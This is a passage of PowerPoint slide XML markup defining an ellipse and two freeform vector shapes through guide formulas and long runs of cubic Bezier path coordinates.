              <a:off x="3182938" y="3903663"/>
              <a:ext cx="1085850" cy="1082675"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="955BA5"/>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67" name="Freeform 179">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28BDFF60-8854-1740-97AB-250F9A4E6A35}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3727450" y="4986338"/>
              <a:ext cx="26988" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 16"/>
                <a:gd name="T1" fmla="*/ 1 w 16"/>
                <a:gd name="T2" fmla="*/ 1 w 16"/>
                <a:gd name="T3" fmla="*/ 1 w 16"/>
                <a:gd name="T4" fmla="*/ 2 w 16"/>
                <a:gd name="T5" fmla="*/ 2 w 16"/>
                <a:gd name="T6" fmla="*/ 2 w 16"/>
                <a:gd name="T7" fmla="*/ 3 w 16"/>
                <a:gd name="T8" fmla="*/ 3 w 16"/>
                <a:gd name="T9" fmla="*/ 3 w 16"/>
                <a:gd name="T10" fmla="*/ 4 w 16"/>
                <a:gd name="T11" fmla="*/ 4 w 16"/>
                <a:gd name="T12" fmla="*/ 4 w 16"/>
                <a:gd name="T13" fmla="*/ 5 w 16"/>
                <a:gd name="T14" fmla="*/ 5 w 16"/>
                <a:gd name="T15" fmla="*/ 5 w 16"/>
                <a:gd name="T16" fmla="*/ 6 w 16"/>
                <a:gd name="T17" fmla="*/ 6 w 16"/>
                <a:gd name="T18" fmla="*/ 6 w 16"/>
                <a:gd name="T19" fmla="*/ 7 w 16"/>
                <a:gd name="T20" fmla="*/ 7 w 16"/>
                <a:gd name="T21" fmla="*/ 7 w 16"/>
                <a:gd name="T22" fmla="*/ 8 w 16"/>
                <a:gd name="T23" fmla="*/ 8 w 16"/>
                <a:gd name="T24" fmla="*/ 8 w 16"/>
                <a:gd name="T25" fmla="*/ 9 w 16"/>
                <a:gd name="T26" fmla="*/ 9 w 16"/>
                <a:gd name="T27" fmla="*/ 9 w 16"/>
                <a:gd name="T28" fmla="*/ 10 w 16"/>
                <a:gd name="T29" fmla="*/ 10 w 16"/>
                <a:gd name="T30" fmla="*/ 10 w 16"/>
                <a:gd name="T31" fmla="*/ 11 w 16"/>
                <a:gd name="T32" fmla="*/ 11 w 16"/>
                <a:gd name="T33" fmla="*/ 11 w 16"/>
                <a:gd name="T34" fmla="*/ 12 w 16"/>
                <a:gd name="T35" fmla="*/ 12 w 16"/>
                <a:gd name="T36" fmla="*/ 12 w 16"/>
                <a:gd name="T37" fmla="*/ 13 w 16"/>
                <a:gd name="T38" fmla="*/ 13 w 16"/>
                <a:gd name="T39" fmla="*/ 13 w 16"/>
                <a:gd name="T40" fmla="*/ 14 w 16"/>
                <a:gd name="T41" fmla="*/ 14 w 16"/>
                <a:gd name="T42" fmla="*/ 14 w 16"/>
                <a:gd name="T43" fmla="*/ 15 w 16"/>
                <a:gd name="T44" fmla="*/ 15 w 16"/>
                <a:gd name="T45" fmla="*/ 15 w 16"/>
                <a:gd name="T46" fmla="*/ 16 w 16"/>
                <a:gd name="T47" fmla="*/ 16 w 16"/>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 ang="0">
                  <a:pos x="T13" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T14" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T15" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T16" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T17" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T18" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T19" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T20" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T21" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T22" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T23" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T24" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T25" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T26" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T27" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T28" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T29" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T30" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T31" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T32" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T33" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T34" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T35" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T36" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T37" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T38" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T39" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T40" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T41" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T42" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T43" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T44" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T45" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T46" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T47" y="0"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="16">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="1" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="0"/>
                    <a:pt x="2" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="0"/>
                    <a:pt x="2" y="0"/>
                    <a:pt x="2" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="0"/>
                    <a:pt x="2" y="0"/>
                    <a:pt x="2" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="3" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="0"/>
                    <a:pt x="2" y="0"/>
                    <a:pt x="2" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="0"/>
                    <a:pt x="2" y="0"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="3" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="0"/>
                    <a:pt x="3" y="0"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="0"/>
                    <a:pt x="3" y="0"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="4" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="0"/>
                    <a:pt x="3" y="0"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="0"/>
                    <a:pt x="4" y="0"/>
                    <a:pt x="4" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="4" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="0"/>
                    <a:pt x="4" y="0"/>
                    <a:pt x="4" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="0"/>
                    <a:pt x="4" y="0"/>
                    <a:pt x="4" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="5" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="4" y="0"/>
                    <a:pt x="4" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="0"/>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="5" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="6" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="0"/>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="6" y="0"/>
                    <a:pt x="6" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="6" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="0"/>
                    <a:pt x="6" y="0"/>
                    <a:pt x="6" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="0"/>
                    <a:pt x="6" y="0"/>
                    <a:pt x="6" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="7" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="0"/>
                    <a:pt x="6" y="0"/>
                    <a:pt x="6" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="0"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="7" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="7" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="0"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="7" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="0"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="7" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="8" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="0"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="7" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="0"/>
                    <a:pt x="8" y="0"/>
                    <a:pt x="8" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="8" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="0"/>
                    <a:pt x="8" y="0"/>
                    <a:pt x="8" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="0"/>
                    <a:pt x="8" y="0"/>
                    <a:pt x="8" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="9" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="8" y="0"/>
                    <a:pt x="8" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="0"/>
                    <a:pt x="9" y="0"/>
                    <a:pt x="9" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="9" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="9" y="0"/>
                    <a:pt x="9" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="9" y="0"/>
                    <a:pt x="9" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="10" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="9" y="0"/>
                    <a:pt x="9" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="10" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="10" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="10" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="10" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="11" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="10" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="11" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="11" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="11" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="11" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="12" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="11" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="12" y="0"/>
                    <a:pt x="12" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="12" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="12" y="0"/>
                    <a:pt x="12" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="12" y="0"/>
                    <a:pt x="12" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="13" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="12" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="13" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="14" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="14" y="0"/>
                    <a:pt x="13" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="14" y="0"/>
                    <a:pt x="14" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="14" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="14" y="0"/>
                    <a:pt x="14" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="14" y="0"/>
                    <a:pt x="14" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="15" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="14" y="0"/>
                    <a:pt x="14" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="15" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="15" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="15" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="15" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="16" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="0"/>
                    <a:pt x="15" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="16" y="0"/>
                    <a:pt x="16" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E1EDD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68" name="Freeform 180">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1567B5FA-ADCC-1349-9256-954E9F98CE6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3384550" y="4151313"/>
              <a:ext cx="882650" cy="835025"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 151 w 515"/>
                <a:gd name="T1" fmla="*/ 1 h 487"/>
                <a:gd name="T2" fmla="*/ 85 w 515"/>
                <a:gd name="T3" fmla="*/ 68 h 487"/>
                <a:gd name="T4" fmla="*/ 19 w 515"/>
                <a:gd name="T5" fmla="*/ 256 h 487"/>
                <a:gd name="T6" fmla="*/ 170 w 515"/>
                <a:gd name="T7" fmla="*/ 486 h 487"/>
                <a:gd name="T8" fmla="*/ 200 w 515"/>
                <a:gd name="T9" fmla="*/ 487 h 487"/>
                <a:gd name="T10" fmla="*/ 200 w 515"/>
                <a:gd name="T11" fmla="*/ 487 h 487"/>
                <a:gd name="T12" fmla="*/ 201 w 515"/>
                <a:gd name="T13" fmla="*/ 487 h 487"/>
                <a:gd name="T14" fmla="*/ 201 w 515"/>
                <a:gd name="T15" fmla="*/ 487 h 487"/>
                <a:gd name="T16" fmla="*/ 202 w 515"/>
                <a:gd name="T17" fmla="*/ 487 h 487"/>
                <a:gd name="T18" fmla="*/ 202 w 515"/>
                <a:gd name="T19" fmla="*/ 487 h 487"/>
                <a:gd name="T20" fmla="*/ 203 w 515"/>
                <a:gd name="T21" fmla="*/ 487 h 487"/>
                <a:gd name="T22" fmla="*/ 203 w 515"/>
                <a:gd name="T23" fmla="*/ 487 h 487"/>
                <a:gd name="T24" fmla="*/ 204 w 515"/>
                <a:gd name="T25" fmla="*/ 487 h 487"/>
                <a:gd name="T26" fmla="*/ 204 w 515"/>
                <a:gd name="T27" fmla="*/ 487 h 487"/>
                <a:gd name="T28" fmla="*/ 205 w 515"/>
                <a:gd name="T29" fmla="*/ 487 h 487"/>
                <a:gd name="T30" fmla="*/ 205 w 515"/>
                <a:gd name="T31" fmla="*/ 487 h 487"/>
                <a:gd name="T32" fmla="*/ 206 w 515"/>
                <a:gd name="T33" fmla="*/ 487 h 487"/>
                <a:gd name="T34" fmla="*/ 206 w 515"/>
                <a:gd name="T35" fmla="*/ 487 h 487"/>
                <a:gd name="T36" fmla="*/ 207 w 515"/>
                <a:gd name="T37" fmla="*/ 487 h 487"/>
                <a:gd name="T38" fmla="*/ 207 w 515"/>
                <a:gd name="T39" fmla="*/ 487 h 487"/>
                <a:gd name="T40" fmla="*/ 208 w 515"/>
                <a:gd name="T41" fmla="*/ 487 h 487"/>
                <a:gd name="T42" fmla="*/ 208 w 515"/>
                <a:gd name="T43" fmla="*/ 487 h 487"/>
                <a:gd name="T44" fmla="*/ 209 w 515"/>
                <a:gd name="T45" fmla="*/ 487 h 487"/>
                <a:gd name="T46" fmla="*/ 209 w 515"/>
                <a:gd name="T47" fmla="*/ 487 h 487"/>
                <a:gd name="T48" fmla="*/ 210 w 515"/>
                <a:gd name="T49" fmla="*/ 487 h 487"/>
                <a:gd name="T50" fmla="*/ 210 w 515"/>
                <a:gd name="T51" fmla="*/ 487 h 487"/>
                <a:gd name="T52" fmla="*/ 211 w 515"/>
                <a:gd name="T53" fmla="*/ 487 h 487"/>
                <a:gd name="T54" fmla="*/ 211 w 515"/>
                <a:gd name="T55" fmla="*/ 487 h 487"/>
                <a:gd name="T56" fmla="*/ 212 w 515"/>
                <a:gd name="T57" fmla="*/ 487 h 487"/>
                <a:gd name="T58" fmla="*/ 212 w 515"/>
                <a:gd name="T59" fmla="*/ 487 h 487"/>
                <a:gd name="T60" fmla="*/ 213 w 515"/>
                <a:gd name="T61" fmla="*/ 487 h 487"/>
                <a:gd name="T62" fmla="*/ 213 w 515"/>
                <a:gd name="T63" fmla="*/ 487 h 487"/>
                <a:gd name="T64" fmla="*/ 214 w 515"/>
                <a:gd name="T65" fmla="*/ 487 h 487"/>
                <a:gd name="T66" fmla="*/ 214 w 515"/>
                <a:gd name="T67" fmla="*/ 487 h 487"/>
                <a:gd name="T68" fmla="*/ 215 w 515"/>
                <a:gd name="T69" fmla="*/ 487 h 487"/>
                <a:gd name="T70" fmla="*/ 215 w 515"/>
                <a:gd name="T71" fmla="*/ 487 h 487"/>
                <a:gd name="T72" fmla="*/ 515 w 515"/>
                <a:gd name="T73" fmla="*/ 182 h 487"/>
                <a:gd name="T74" fmla="*/ 285 w 515"/>
                <a:gd name="T75" fmla="*/ 55 h 487"/>
                <a:gd name="T76" fmla="*/ 185 w 515"/>
                <a:gd name="T77" fmla="*/ 5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5" h="487">
                  <a:moveTo>
                    <a:pt x="168" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="0"/>
                    <a:pt x="155" y="1"/>
                    <a:pt x="151" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="1"/>
                    <a:pt x="109" y="1"/>
                    <a:pt x="89" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="1"/>
                    <a:pt x="85" y="55"/>
                    <a:pt x="85" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="99"/>
                    <a:pt x="88" y="118"/>
                    <a:pt x="74" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="182"/>
                    <a:pt x="37" y="219"/>
                    <a:pt x="19" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="288"/>
                    <a:pt x="0" y="313"/>
                    <a:pt x="26" y="339"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="390"/>
                    <a:pt x="121" y="438"/>
                    <a:pt x="170" y="486"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="487"/>
                    <a:pt x="190" y="487"/>
                    <a:pt x="200" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="487"/>
                    <a:pt x="200" y="487"/>
                    <a:pt x="200" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="487"/>
                    <a:pt x="200" y="487"/>
                    <a:pt x="200" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="487"/>
                    <a:pt x="200" y="487"/>
                    <a:pt x="200" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="487"/>
                    <a:pt x="200" y="487"/>
                    <a:pt x="201" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="487"/>
                    <a:pt x="201" y="487"/>
                    <a:pt x="201" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="487"/>
                    <a:pt x="201" y="487"/>
                    <a:pt x="201" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="487"/>
                    <a:pt x="201" y="487"/>
                    <a:pt x="201" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="487"/>
                    <a:pt x="201" y="487"/>
                    <a:pt x="202" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="487"/>
                    <a:pt x="202" y="487"/>
                    <a:pt x="202" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="487"/>
                    <a:pt x="202" y="487"/>
                    <a:pt x="202" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="487"/>
                    <a:pt x="202" y="487"/>
                    <a:pt x="202" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="487"/>
                    <a:pt x="203" y="487"/>
                    <a:pt x="203" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="487"/>
                    <a:pt x="203" y="487"/>
                    <a:pt x="203" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="487"/>
                    <a:pt x="203" y="487"/>
                    <a:pt x="203" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="487"/>
                    <a:pt x="203" y="487"/>
                    <a:pt x="203" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="487"/>
                    <a:pt x="204" y="487"/>
                    <a:pt x="204" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="487"/>
                    <a:pt x="204" y="487"/>
                    <a:pt x="204" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="487"/>
                    <a:pt x="204" y="487"/>
                    <a:pt x="204" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="487"/>
                    <a:pt x="204" y="487"/>
                    <a:pt x="204" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="487"/>
                    <a:pt x="205" y="487"/>
                    <a:pt x="205" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="487"/>
                    <a:pt x="205" y="487"/>
                    <a:pt x="205" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="487"/>
                    <a:pt x="205" y="487"/>
                    <a:pt x="205" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="487"/>
                    <a:pt x="205" y="487"/>
                    <a:pt x="205" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="487"/>
                    <a:pt x="206" y="487"/>
